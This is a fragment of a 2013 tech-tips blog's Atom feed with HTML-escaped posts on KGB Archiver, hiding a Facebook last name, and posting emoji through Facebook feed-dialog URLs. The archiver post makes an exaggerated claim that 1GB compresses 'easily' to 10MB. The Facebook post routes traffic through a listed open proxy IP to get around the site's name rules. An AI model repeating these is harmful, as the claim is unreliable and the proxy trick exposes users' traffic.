&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGALR5otqJgF_IDhVHT9m7IHFN-6deRRfHcpZJIOj6wF9Pql_xKzpcwgBdbgUU5kAGJf4LkaqtgSod4pM52XRQJGyEw3-wZPZ2YTzqa0YvtQdSOsIldVX65QnQ4IpdVVNCGX9Mo7rn48/s1600/kgb-archiver-compressor.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;background-color: white; color: #3058aa; text-decoration: none;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;img alt=&quot;compress big files&quot; border=&quot;0&quot; data=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGALR5otqJgF_IDhVHT9m7IHFN-6deRRfHcpZJIOj6wF9Pql_xKzpcwgBdbgUU5kAGJf4LkaqtgSod4pM52XRQJGyEw3-wZPZ2YTzqa0YvtQdSOsIldVX65QnQ4IpdVVNCGX9Mo7rn48/s320/kgb-archiver-compressor.jpeg&quot; style=&quot;border-width: 0px; opacity: 0.5;&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;KGB Archiver is free and open source software which compress big file into small. With the Use of KGB Archiver you can convert 1GB to 10MB easily.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;a href=&quot;http://www.blogger.com/blogger.g?blogID=276484908558385294&quot; name=&quot;more&quot; style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;&lt;/a&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Note: If you are compressing any file with KGB archiver and sending the comprssed file to your friends then he must have KBG archiver installed on his computer to decompress the file.&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;a href=&quot;http://sourceforge.net/projects/kgbarchiver/&quot; rel=&quot;nofollow&quot; style=&quot;color: #3058aa; font-family: &#39;Georgia Serif&#39;; text-align: center; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;&amp;nbsp;To download KGB Archiver&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;h4 style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;System Requirements:&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- 256 MB RAM&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- 1.5 GHz Processor&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;h4 style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Features of KGB Archiver&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- Supports native .kgb files and .zip files&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- AES-256 Encryption&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- Able to create self-extracting archives.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- Multilanguage supports like Arabic, German, Greek, Japanese, Spanish many more.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- Unicode is supported in both User Interface and File Systems.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- An Explorer shell extension is available for the windows version.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;- Make Password protected compressed file.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/3232455324443882470/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/compress-big-files-into-small-files.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/3232455324443882470'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/3232455324443882470'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/compress-big-files-into-small-files.html' title='Compress Big Files Into Small Files'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigGALR5otqJgF_IDhVHT9m7IHFN-6deRRfHcpZJIOj6wF9Pql_xKzpcwgBdbgUU5kAGJf4LkaqtgSod4pM52XRQJGyEw3-wZPZ2YTzqa0YvtQdSOsIldVX65QnQ4IpdVVNCGX9Mo7rn48/s72-c/kgb-archiver-compressor.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1113188483057655292</id><published>2013-09-16T19:10:00.002+05:30</published><updated>2013-09-16T19:10:38.061+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><title type='text'>How to Hide Last Name from Facebook</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;pinit-wrapper&quot; style=&quot;color: #333333; cursor: pointer; font-family: &#39;Georgia Serif&#39;; left: 384px; opacity: 0; position: absolute; text-align: center; top: 811.578125px; visibility: hidden; z-index: 9999;&quot;&gt;
&lt;a href=&quot;http://pinterest.com/pin/create/button/?url=http://www.cybertweaks.com/2012/10/how-to-hide-last-name-from-facebook.html&amp;amp;media=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBijmHIT2mhl51pBksLy601hs0rBuZWrLDDH8D0h2MJ_RsacIen4nU3rSJIddgqndjx44zhbsg0onlLRJCOzX4K4q9faGuhQK2V_Zo9rbtQp5_WXFDmaOypaI3MVFZs2vsv-MyIHz4T2A/s400/hide-last-name-on-facebook.jpg&amp;amp;description=How%20to%20Hide%20Last%20Name%20from%20Facebook%20Profile&quot; style=&quot;color: #3058aa; display: block; outline: none; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;img class=&quot;pinimg&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3N5QR0iSYMJcgzvZGrM1KB9tCl6mXdipK2kaMspStq9tWDnbambW-r9eh-DBzL-_5fqTqdaADr9dwTqx1rcSom6vXxawFY8IOR9svXdrploSzxd3t5BbzyEI8CvnKeadgwl0tFzWpvT4-/s1600/pinterestx1_72.png&quot; style=&quot;-webkit-box-shadow: none; border: 0px; box-shadow: none; margin: 0px; padding: 0px;&quot; title=&quot;Pin on Pinterest&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Hello i&#39;m going to share a tutorial by which you can hide your last name on facebook.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;It may seems strange because facebook isn&#39;t allow you to do so but you can actually do that :-)&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;a href=&quot;&quot; name=&quot;more&quot; style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;&lt;/a&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;First you need Indonesian Proxy servers. You can use following,&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;HTTP Proxy: 118.97.223.210&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Port: 3128&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;If this Proxy server is not working, get more proxy servers from here:&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.proxynova.com/proxy-server-list/country-id/&quot; rel=&quot;nofollow&quot; style=&quot;color: #3058aa; font-family: &#39;Georgia Serif&#39;; text-align: center; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.proxynova.com/proxy-server-list/country-id/&lt;/a&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Go to firefox browser and change proxy setting like this image below&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZV_v7_Eth8bV2PuHIm9DoXePk1sQyX9CrfXXW0yuDXHxJ-SECGq2xTlZ_bIs68P2BKneucAbuRcHjOLOxJKZwIY5jl24rJb__6ttUPwtgT9xXJte0D3MZlks9G_Wq-U9vOQD8RJKzSo/s1600/chnage-proxy-on-firefox.jpg&quot; imageanchor=&quot;1&quot; style=&quot;color: #3058aa; font-family: &#39;Georgia Serif&#39;; text-align: center; text-decoration: none;&quot;&gt;&lt;img alt=&quot;trick for hiding last name of facebook profile&quot; data=&quot;1&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZV_v7_Eth8bV2PuHIm9DoXePk1sQyX9CrfXXW0yuDXHxJ-SECGq2xTlZ_bIs68P2BKneucAbuRcHjOLOxJKZwIY5jl24rJb__6ttUPwtgT9xXJte0D3MZlks9G_Wq-U9vOQD8RJKzSo/s600/chnage-proxy-on-firefox.jpg&quot; style=&quot;border-width: 0px; opacity: 1;&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;pinit-wrapper&quot; style=&quot;color: #333333; cursor: pointer; font-family: &#39;Georgia Serif&#39;; left: 453.5px; opacity: 0; position: absolute; text-align: center; top: 1605.578125px; visibility: visible; z-index: 9999;&quot;&gt;
&lt;a href=&quot;http://pinterest.com/pin/create/button/?url=http://www.cybertweaks.com/2012/10/how-to-hide-last-name-from-facebook.html&amp;amp;media=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHZV_v7_Eth8bV2PuHIm9DoXePk1sQyX9CrfXXW0yuDXHxJ-SECGq2xTlZ_bIs68P2BKneucAbuRcHjOLOxJKZwIY5jl24rJb__6ttUPwtgT9xXJte0D3MZlks9G_Wq-U9vOQD8RJKzSo/s600/chnage-proxy-on-firefox.jpg&amp;amp;description=How%20to%20Hide%20Last%20Name%20from%20Facebook%20Profile&quot; style=&quot;color: #3058aa; display: block; outline: none; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;img class=&quot;pinimg&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3N5QR0iSYMJcgzvZGrM1KB9tCl6mXdipK2kaMspStq9tWDnbambW-r9eh-DBzL-_5fqTqdaADr9dwTqx1rcSom6vXxawFY8IOR9svXdrploSzxd3t5BbzyEI8CvnKeadgwl0tFzWpvT4-/s1600/pinterestx1_72.png&quot; style=&quot;-webkit-box-shadow: none; border: 0px; box-shadow: none; margin: 0px; padding: 0px;&quot; title=&quot;Pin on Pinterest&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;h5 style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Steps to change proxy on Firefox&lt;/span&gt;&lt;/span&gt;&lt;/h5&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Click firefox Button att the top &amp;gt; Options &amp;gt; Advanced &amp;gt; Network &amp;gt; Settings &amp;gt; Connection settings and choose manual proxy configuration. also tick use this proxy server for all protocols.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;put 118.97.223.210 on No Proxy for box.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Now go to your Profile,&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Change the language to bhasha indonesia&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;remove your last name and save changes.&amp;nbsp;&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;(Just remember the steps if you dont understand bhasha indonesia. after you got your single name change your language to whatever you want )&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;You are Done now your last name will not visible anymore.&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;You can use some weird spacial characters just check this out,&lt;/span&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;a href=&quot;http://www.facebook.com/notes/cyber-tweaks/facebook-weird-names/426367524089364&quot; rel=&quot;nofollow&quot; style=&quot;color: #3058aa; font-family: &#39;Georgia Serif&#39;; text-align: center; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.facebook.com/notes/cyber-tweaks/facebook-weird-names/426367524089364&lt;/a&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;br style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot; /&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;Demo :&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.facebook.com/assi.invinsible&quot; rel=&quot;nofollow&quot; style=&quot;color: #3058aa; font-family: &#39;Georgia Serif&#39;; text-align: center; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.facebook.com/assi.invinsible&lt;/a&gt;&lt;span style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;&amp;nbsp;-&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1113188483057655292/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-hide-last-name-from-facebook.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1113188483057655292'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1113188483057655292'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-hide-last-name-from-facebook.html' title='How to Hide Last Name from Facebook'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3N5QR0iSYMJcgzvZGrM1KB9tCl6mXdipK2kaMspStq9tWDnbambW-r9eh-DBzL-_5fqTqdaADr9dwTqx1rcSom6vXxawFY8IOR9svXdrploSzxd3t5BbzyEI8CvnKeadgwl0tFzWpvT4-/s72-c/pinterestx1_72.png" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-1882231876145469203</id><published>2013-09-16T19:01:00.002+05:30</published><updated>2013-09-16T19:01:33.859+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Facebook"/><category scheme="http://www.blogger.com/atom/ns#" term="Facebook Status"/><title type='text'> How To Post Animated smiley on your Facebook wall</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;div style=&quot;color: #333333; font-family: &#39;Georgia Serif&#39;; text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;&quot; name=&quot;more&quot;&gt;&lt;/a&gt;&lt;br /&gt;1. go to this page ----&amp;gt;&amp;nbsp;&lt;a href=&quot;http://fbnoob.ho.am/emoji.php&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://fbnoob.ho.am/emoji.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2.You can see smiley just click on smiley you want it will generated as as text. see textbox.&lt;br /&gt;&lt;br /&gt;3. Copy that code and update it using fb status Updater code.&lt;br /&gt;&lt;br /&gt;Code for your staus update :-&lt;br /&gt;&lt;br /&gt;http://www.facebook.com/dialog/feed?app_id=&lt;span style=&quot;color: red;&quot;&gt;Your API&lt;/span&gt;&amp;amp;redirect_uri=http://www.facebook.com/&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&amp;amp;redirect_uri=http://www.facebook.com/&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&amp;amp;redirect_uri=http://www.facebook.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Change you api -----&amp;nbsp;&lt;a href=&quot;http://cybertweaks.blogspot.com/2011/07/update-facebook-status-via-different.html&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;HOw to get you own API&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Update friends status :-&lt;br /&gt;&lt;br /&gt;http://www.facebook.com/dialog/feed?app_id=&lt;span style=&quot;color: red;&quot;&gt;Your API&lt;/span&gt;&amp;amp;redirect_uri=http://www.facebook.com/&amp;amp;to=&lt;span style=&quot;color: red;&quot;&gt;Your friends ID&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Ex:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&amp;amp;redirect_uri=http://www.facebook.com/&amp;amp;to=100000514929594&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://www.facebook.com/dialog/feed?app_id=9926d66ea6ddb663b3fae82f4e6a66d7&amp;amp;redirect_uri=http://www.facebook.com/&amp;amp;to=100000514929594&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Find Facebook id ------&amp;nbsp;&lt;a href=&quot;http://cybertweaks.blogspot.com/2011/08/how-to-find-facebook-id.html&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;How to find Facebook ID&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;4. You are Done :)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;How To Post Animated smiley on your About me and Favorite Quotations :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. go to this page ----&amp;gt;&amp;nbsp;&lt;a href=&quot;http://fbnoob.ho.am/emoji.php&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://fbnoob.ho.am/emoji.php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Copy the code from textbox and paste it on you about me.&lt;br /&gt;&lt;br /&gt;3. You are Done ;)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Some Blank Smiley code :&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Check out this page ------&amp;nbsp;&lt;a href=&quot;http://pastebin.com/x6qkTN7C&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://pastebin.com/x6qkTN7C&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;For more smiley Code use these Applications:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://apps.facebook.com/animated-picture&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://apps.facebook.com/animated-picture&lt;/a&gt;&amp;nbsp;Go to Emoji Emotions Tab&lt;br /&gt;&lt;a href=&quot;http://h.hatena.com/KamikoUrin/&quot; style=&quot;color: #3058aa; text-decoration: none;&quot;&gt;http://h.hatena.com/KamikoUrin/&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/1882231876145469203/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-post-animated-smiley-on-your.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1882231876145469203'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/1882231876145469203'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2013/09/how-to-post-animated-smiley-on-your.html' title=' How To Post Animated smiley on your Facebook wall'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-2482679876424048153</id><published>2013-09-11T22:15:00.001+05:30</published><updated>2013-09-11T22:15:04.650+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Solution For Avast Black Screen Problem In Windows 8</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
